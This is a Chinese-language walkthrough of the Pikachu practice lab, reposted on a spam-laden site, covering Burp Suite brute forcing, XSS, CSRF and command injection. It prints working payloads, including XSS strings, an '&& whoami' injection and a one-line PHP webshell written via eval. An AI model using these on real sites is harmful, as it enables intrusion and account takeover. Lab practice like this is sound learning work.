当前位置: 首页 > wzjs >正文

北京网站建设成都重庆百度seo排名

北京网站建设成都,重庆百度seo排名,ui设计师能独立做网站吗,建筑挂靠网暴力破解 基于表单的暴力破解 【2024版】最新BurpSuit的使用教程(非常详细)零基础入门到精通,看一篇就够了!让你挖洞事半功倍!_burpsuite使用教程-CSDN博客 登录页面,随意输入抓包,发送到攻击…

暴力破解

基于表单的暴力破解

【2024版】最新BurpSuit的使用教程(非常详细)零基础入门到精通,看一篇就够了!让你挖洞事半功倍!_burpsuite使用教程-CSDN博客

登录页面,随意输入抓包,发送到攻击模块

我们攻击要两个目标,选择集群炸弹攻击,用户名是wp看到的

导入弱密码本开始攻击,看到三组账号密码

返回登录即可

验证码绕过(on server

同样随意输入抓包

和上关一样的操作,抓到的账号密码也和上关一样,随后发送到重放器修改正确的账号密码发送即可

验证码绕过(on client)

同上一样的操作,抓包爆破,得到的账号密码也一样

token防爆破

抓包

可以看到有token值,token是后端产生的一个字符串,并且会发给前端,每当前端发起一次登录请求时,就会把该token一起发给后端,后端在验证账号密码前会先验证token的值是否正确然后才会验证账号密码;后端每收到一次请求就会产生一个新的token,同时把token连同响应信息一起发给前端

可以看到token在前端,而且很长,是由定义的计算得来的,所以我们没办法直接爆破

我们使用干草叉爆破,密码照样导入密码本

token的payload模式如图选择,在设置中选定payload值

获取响应之后选中token值,会自己设置payload值攻击得到密码和token值

发送到重放器发送即可

反射型xss(get)

打开想输入常规的检查语句触发弹窗,发现有字数限制

直接改源码

再发送即可

反射性xss(post)

先是登录界面,和第一关一样爆破而已这里直接用之前的账号密码登录

再是使用上一关的做法即可

存储型xss

同上

DOM型xss

尝试,显然不行

看源码可以看到超链接等于我们输入的值

那么输入JavaScript:alert()为协议触发js代码执行即可打开弹窗

DOM型xss-x

尝试输入弹窗字符串显然没用,看源码

还是有超链接,同上

xss盲打

输入弹窗字符没反应,看源码甚至前端都没有输入的字符

了解原理

在一些网站应用中,存在 XSS 漏洞的页面可能并不直接在当前用户的浏览器中显示,或者即使存在漏洞但由于页面的显示逻辑、访问权限等原因,攻击者无法即时看到注入的恶意脚本是否执行以及执行的结果。此时,攻击者将恶意脚本注入到目标网站中,当满足特定条件(比如管理员或其他具有特定权限的用户访问了包含恶意脚本的页面)时,恶意脚本会在目标用户(通常是权限较高的用户)的浏览器中执行。恶意脚本执行后,会将窃取到的敏感信息(如用户的 Cookie、会话令牌等)发送到攻击者控制的服务器上,攻击者就可以利用这些信息进一步控制用户的账号或进行其他非法操作。

简单来说我们在外来普通账户去输入恶意代码是会被强制发送到后端,我们无法看到代码是否执行,我们需要得到类似管理员账号登录后再进行操作,才可能执行成功

这边也有给提示后台的地址

先发送代码,之后登录后台即可

xss之过滤

输入弹窗代码,给了提示估计是一些字符串被过滤了

看样子是<>被过滤了,尝试onfocus事件

也是不行,回头看上传的字符串像是被删除了<script>alert()</script>变成了>,尝试使用双写字符绕过<scri<script>pt> alert()</scri</script>pt>,还是一样错了,那应该不是简单的替换

答案是使用img标签进行弹窗

<img src=''οnerrοr='alert(1)'/>

xss之htmlspecialchars

输入弹窗代码,可以看到还是有超链接

使用js为协议触发超链接即可

xss之href输出

同上,有超链接

和上面一样的解决办法

xss之js输出

输入弹窗代码,没有反应也没有超链接

随意输入字符发现把我们输入的字符用<script><script>包裹且中间有一些判定条件

按照提示输入tmac弹出图片

原本是会执行alert(ms)并输出语句的但是这行代码被加了注释,所以只会输出语句,现在的思路就是要构造ms去弹窗,就是考对js代码的运用而已

答案是';alert();//     先用'闭合前面加注释的字符串,再用;分割开使后面的代码能够正常运行后面还要加//注释也是保证代码运行

CSRF(get) login

随意输入之后抓取,开始爆破

爆破没有结果,之后看提示给了账号密码,随意选一个登录

随意修改之后抓包

仔细看会发现给了一个地址,使用在线编辑器编辑一个网站内容是抓包的链接,因为本题是get传参所以可以用链接来请求

发送给目标若点击链接即可修改信息

CSRF(post)

同样登录一个账号

修改抓包

post请求要自己去写一个表单,放在网站的目录中,当用户点击就会被修改信息,这边等代码知识扎实一点再来

CSRF Token

同上

exec "ping

尝试ping一下本地地址

输入127.0.0.1 && whoami,可获得信息

“&&”在命令行中通常表示逻辑与操作,即只有当左边的命令成功执行后,才会执行右边的命令。“whoami”是一个命令,用于显示当前用户的名称,先尝试ping地址,如果成功再执行“whoami”命令显示当前用户名称。

exec "eval"

随意输入

根据提示,我们提交的字符串会以eval(字符串)形式执行,而eval()函数会将括号中正确的php代码当成php文件执行,所以我们在里面生成一个一句话木马即可

file_put_contents('456.php','<?php eval(@$_REQUEST[456]);?>');

创建一个名为456.php的文件使用file_put_contents()函数将一句话木马写进456.php

上传蚁剑链接

http://www.dtcms.com/wzjs/178616.html

相关文章:

  • 人力资源公司网站模板下载软文营销什么意思
  • 设计素材网站黄金烤肠云搜索app下载
  • 嵌入式软件开发面试广州网站优化服务商
  • 重庆网站自己推广专业seo站长工具
  • 九台市做网站的公司优化网站建设
  • 智游泰州小程序怎么注册百度seo多久能优化关键词
  • 网站建设公司合同项目推广方案
  • 安徽鲁班建设集团网站营业推广策划
  • 网站开发我们都能解决公司网站建设多少钱
  • 垂直门户网站的盈利模式探讨互联网推广引流是做什么的
  • 保洁公司用哪些网站做推广免费建立个人网站
  • 汉中专业做网站免费友链互换
  • 福建两学一做网站昆明网络营销公司哪家比较好
  • axure怎么做网站原型网站开发公司哪家好
  • 网站怎么做IPv6少儿编程培训机构排名前十
  • 上海网站建设开全国疫情最新报告
  • 如何将网站内容做chm怎么做网站推广和宣传
  • 创办网站需要哪些步骤代发百度首页排名
  • 外贸网站怎么做谷歌搜索江西网络推广seo
  • 网站建设免费视频教程seo系统教程
  • 建站行业市场容量怎么制作公司网站
  • 各购物网站销售特点百度广告推广收费标准
  • 推荐做网站的话术建一个网站需要多少钱?
  • 个人网页官方网站每天新闻早知道
  • 建设网站市场分析免费有效的推广平台
  • 国外 精美 网站免费做网站软件
  • 售房网站开发 .net搜索引擎优化到底是优化什么
  • 广西建设网站大连网站建设
  • 包装袋设计网站推荐华为手机软文范文300
  • 1688批发厂家直销泰安seo公司